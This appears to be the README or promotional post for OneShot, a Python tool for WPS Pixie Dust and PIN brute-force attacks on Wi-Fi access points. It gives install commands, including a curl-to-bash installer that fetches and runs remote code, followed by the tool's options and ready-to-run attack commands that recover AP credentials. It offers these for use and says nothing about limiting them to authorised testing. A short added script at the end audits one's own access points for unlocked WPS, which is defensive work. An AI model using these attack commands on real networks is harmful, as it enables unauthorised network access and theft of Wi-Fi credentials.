OneShot: WPS PIN attacks without monitor mode!

OneShot is an open source Python script that runs Pixie Dust attacks without first having to switch the wireless interface to monitor mode.

Characteristics

System requirements

Installation

Debian / Ubuntu

sudo apt install -y python3 wpasupplicant iw wget

Pixiewps installation

Ubuntu 18.04 and later or Debian 10 and later

sudo apt install -y pixiewps

Other versions

sudo apt install -y build-essential unzip
wget https://github.com/wiire-a/pixiewps/archive/master.zip && unzip master.zip
cd pixiewps*/
make
sudo make install

Download OneShot

cd ~
wget https://raw.githubusercontent.com/drygdryg/OneShot/master/oneshot.py

Optional: download the list of devices vulnerable to Pixie Dust, which is used to highlight them in the scan results:

wget https://raw.githubusercontent.com/drygdryg/OneShot/master/vulnwsc.txt

Arch Linux

Installation requirements

sudo pacman -S wpa_supplicant pixiewps wget python

Download OneShot

wget https://raw.githubusercontent.com/drygdryg/OneShot/master/oneshot.py

Optional: download the list of devices vulnerable to Pixie Dust, which is used to highlight them in the scan results:

wget https://raw.githubusercontent.com/drygdryg/OneShot/master/vulnwsc.txt

Alpine Linux

This setup can also be used on Android devices running Linux Deploy.

Installation requirements
Add the testing repository:

sudo sh -c 'echo "http://dl-cdn.alpinelinux.org/alpine/edge/testing/" >> /etc/apk/repositories'
sudo apk add python3 wpa_supplicant pixiewps iw

Download OneShot

sudo wget https://raw.githubusercontent.com/drygdryg/OneShot/master/oneshot.py

Optional: download the list of devices vulnerable to Pixie Dust, which is used to highlight them in the scan results:

sudo wget https://raw.githubusercontent.com/drygdryg/OneShot/master/vulnwsc.txt

Termux

Note that root access is required.

Using the installer

curl -sSf https://raw.githubusercontent.com/drygdryg/OneShot_Termux_installer/master/installer.sh | bash

Manually

Installation requirements

pkg install -y root-repo

pkg install -y git tsu python wpa-supplicant pixiewps iw

Download OneShot

git clone --depth 1 https://github.com/drygdryg/OneShot OneShot

Running

sudo python OneShot/oneshot.py -i wlan0 --iface-down -K

Usage

oneshot.py <arguments>
 Required arguments:
     -i, --interface=<wlan0>  : Name of the interface to use

 Optional arguments:
     -b, --bssid=<mac>        : BSSID of the target AP
     -p, --pin=<wps pin>      : Use the specified pin (arbitrary string or 4/8 digit pin)
     -K, --pixie-dust         : Run Pixie Dust attack
     -B, --bruteforce         : Run online bruteforce attack
     --push-button-connect    : Run WPS push button connection

 Advanced arguments:
     -d, --delay=<n>          : Set the delay between pin attempts [0]
     -w, --write              : Write AP credentials to the file on success
     -F, --pixie-force        : Run Pixiewps with --force option (bruteforce full range)
     -X, --show-pixie-cmd     : Alway print Pixiewps command
     --vuln-list=<filename>   : Use custom file with vulnerable devices list ['vulnwsc.txt']
     --iface-down             : Down network interface when the work is finished
     -l, --loop               : Run in a loop
     -v, --verbose            : Verbose output

Start the Pixie Dust attack on a specified BSSID:

sudo python3 oneshot.py -i wlan0 -b 00:90:4C:C1:AC:21 -K

Show available networks and run a Pixie Dust attack on a specified network:

sudo python3 oneshot.py -i wlan0 -K

Run a WPS bruteforce attack with the specified first half of the PIN:

sudo python3 oneshot.py -i wlan0 -b 00:90:4C:C1:AC:21 -B -p 1234

WPS connection mode:

Download the program from here.
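
To check your own access points for the condition the commands above depend on (WPS advertised and not locked), here is an added example that is not part of OneShot or of the original post. It parses the text of `iw dev <iface> scan`; the sample scan, the BSSIDs and the name audit_wps are constructed for illustration, and the line formats assume iw's usual scan output.

```python
import re

# Constructed sample of `iw dev wlan0 scan` output (not from a real network).
SAMPLE_SCAN = """\
BSS 02:00:00:aa:bb:01(on wlan0)
\tSSID: office-ap
\tWPS:\t * Version: 1.0
\t\t * Wi-Fi Protected Setup State: 2 (Configured)
BSS 02:00:00:aa:bb:02(on wlan0)
\tSSID: lab-ap
\tWPS:\t * Version: 1.0
\t\t * Wi-Fi Protected Setup State: 2 (Configured)
\t\t * AP setup locked: 0x01
BSS 02:00:00:aa:bb:03(on wlan0)
\tSSID: guest-ap
"""

BSS_RE = re.compile(r"^BSS ([0-9a-f:]{17})", re.I)        # start of one AP record
WPS_RE = re.compile(r"^\s+WPS:\s+\* Version:")             # WPS element present
LOCK_RE = re.compile(r"^\s+\* AP setup locked: (0x[0-9a-f]+)", re.I)

def audit_wps(scan_text, own_bssids):
    """Return {bssid: finding} for each of your own BSSIDs (assumed inventory)."""
    aps, cur = {}, None
    for line in scan_text.splitlines():
        m = BSS_RE.match(line)
        if m:
            cur = aps.setdefault(m.group(1).lower(), {"wps": False, "locked": False})
        elif cur is not None and WPS_RE.match(line):
            cur["wps"] = True
        elif cur is not None and (m := LOCK_RE.match(line)):
            cur["locked"] = int(m.group(1), 16) != 0
    report = {}
    for bssid in (b.lower() for b in own_bssids):
        ap = aps.get(bssid)
        if ap is None:
            report[bssid] = "not seen in scan"
        elif not ap["wps"]:
            report[bssid] = "WPS not advertised"
        elif ap["locked"]:
            report[bssid] = "WPS advertised, setup locked"
        else:
            report[bssid] = "WPS advertised and unlocked: disable WPS"
    return report

if __name__ == "__main__":
    for bssid, finding in audit_wps(SAMPLE_SCAN, ["02:00:00:AA:BB:01"]).items():
        print(bssid, finding)
```

An AP reported as "setup locked" still has WPS switched on; turning WPS off in the AP's configuration is what removes the exposure.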
